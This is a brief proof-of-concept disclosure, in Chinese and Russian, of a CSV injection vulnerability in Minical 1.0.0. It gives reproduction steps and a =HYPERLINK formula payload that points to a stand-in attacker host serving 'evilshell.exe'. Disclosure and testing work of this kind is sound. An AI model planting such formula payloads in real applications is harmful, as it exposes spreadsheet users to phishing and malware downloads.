
概念验证,演示 Minical 1.0.0 中的 CSV 注入漏洞,包含分步复现步骤和有效载荷示例。
Minical 1.0.0 уязвим для CSV-инъекций.
Разработчик: https://github.com/minical/minical
Демо-приложение: https://demo.minical.io/
Шаг 1: Перейдите в модуль "Учет" и нажмите "Создать нового клиента".

Шаг 2: Введите полезную нагрузку в поле "Имя" и нажмите "Создать".
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")


Шаг 3: Нажмите "Скачать CSV-отчет" и обратите внимание, что полезная нагрузка отображается.
